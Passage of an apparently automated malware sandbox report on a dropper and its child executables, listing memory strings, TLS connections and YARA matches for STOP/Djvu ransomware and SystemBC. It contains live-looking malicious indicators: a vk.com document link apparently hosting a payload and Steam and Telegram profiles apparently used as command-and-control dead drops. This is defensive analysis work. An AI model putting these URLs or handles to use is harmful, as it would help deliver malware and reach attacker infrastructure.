Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1922064938.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1919764098.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1920082579.0000013416382000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1921474943.00000134161E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://papi.vk.com/pushsse/ruim
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://platform.twitter.com
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://r.mradx.net
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917671852.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1966252431.000001341615B000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917671852.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1966252431.000001341615B000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://securepubads.g.doubleclick.net
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1922064938.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1919764098.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1920082579.0000013416382000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1921474943.00000134161E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-21.vk.com
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1922064938.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1919764098.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1920082579.0000013416382000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1921474943.00000134161E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-21.vk.com/css/al/base.3e47d375.css
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1922064938.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1919764098.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1920082579.0000013416382000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1921474943.00000134161E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-21.vk.com/css/al/common.871c328a.css
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1922064938.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1919764098.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1920082579.0000013416382000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1921474943.00000134161E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-21.vk.com/css/al/fonts_cnt_async.4881739c.css
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1922064938.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1919764098.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1920082579.0000013416382000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1921474943.00000134161E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-21.vk.com/css/al/fonts_utf.7fa94ada.css
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1922064938.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1919764098.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1920082579.0000013416382000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1921474943.00000134161E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-21.vk.com/css/al/vkui.2b67d8c9.css
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1922064938.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1919764098.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1920082579.0000013416382000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1921474943.00000134161E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://st6-21.vk.com/css/fonts/VKSansDisplayDemiBoldFaux.v100.woff2
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://static.vk.me
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1922064938.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1919764098.0000013416351000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1920082579.0000013416382000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1921474943.00000134161E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://stats.vk-portal.net
Source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2186305168.000000000385F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199751190313
Source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2186305168.000000000385F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199751190313ir3
Source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2186305168.000000000385F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/pech0nk
Source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2186305168.000000000385F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/pech0nkhellosqlr.dllsqlite3.dllIn
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1966252431.000001341615B000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tagmanager.google.com
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917671852.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1966252431.000001341615B000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://telegram.org
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1966252431.000001341615B000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ton.twimg.com
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917671852.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1966252431.000001341615B000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://translate.googleapis.com
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906261672.0000013415B8C000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1965929356.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1911172424.0000013415B8F000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1915315001.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1985145992.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1910751635.0000013415B8C000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1990338824.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1990503386.0000013415B86000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906261672.0000013415B8C000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1965929356.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1911172424.0000013415B8F000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1915315001.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1985145992.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1910751635.0000013415B8C000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1990338824.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1990503386.0000013415B86000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/S
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1966252431.000001341615B000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/browser_reports?dest=default_reports
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1910751635.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com/doc869877400_679230593?hash=JDs0Rq6RGgLMWXUFzWMB8cYHTybh6lXFwxmcZ1ZeK2w&dl=uMxA8hZLVN
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917671852.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1906261672.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1911172424.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1915315001.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1910751635.0000013415BAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.com:80/doc869877400_679230593?hash=JDs0Rq6RGgLMWXUFzWMB8cYHTybh6lXFwxmcZ1ZeK2w&dl=uMxA8hZ
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://vk.ru
Source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.digicert.com/CPS0
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917671852.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1966252431.000001341615B000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917671852.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1966252431.000001341615B000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.instagram.com
Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917671852.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415BC4000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1966252431.000001341615B000.00000004.00000020.00020000.00000000.sdmp, 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe, 00000000.00000003.1917477514.0000013415B7A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://yastatic.net

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822

Source: unknown	HTTPS traffic detected: 104.26.8.59:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.0.209.124:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.240.132.78:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.76.141:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.47.141:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.69.39:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 92.122.104.90:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.73.43:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 78.46.239.218:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.14.101:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 92.122.104.90:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 54.210.117.250:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49823 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.193:443 -> 192.168.2.4:49830 version: TLS 1.2

Source: bQnXcKn6ehLDJGqEStjbnSyC.exe, 00000008.00000002.2982438117.0000000002D44000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: GetRawInputData

memstr_48df30a6-4

Spam, unwanted Advertisements and Ransom Demands

Yara detected Djvu Ransomware

Source: Yara match	File source: 10.2.NjdbLPleIutA8FKI_S3fRztd.exe.20015a0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.NjdbLPleIutA8FKI_S3fRztd.exe.20015a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: NjdbLPleIutA8FKI_S3fRztd.exe PID: 180, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.NjdbLPleIutA8FKI_S3fRztd.exe.20015a0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.NjdbLPleIutA8FKI_S3fRztd.exe.20015a0.1.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 10.2.NjdbLPleIutA8FKI_S3fRztd.exe.20015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 10.2.NjdbLPleIutA8FKI_S3fRztd.exe.20015a0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 11.2.NoCZBiPwAcSyoDte_ne2sJt7.exe.983fa38.10.raw.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
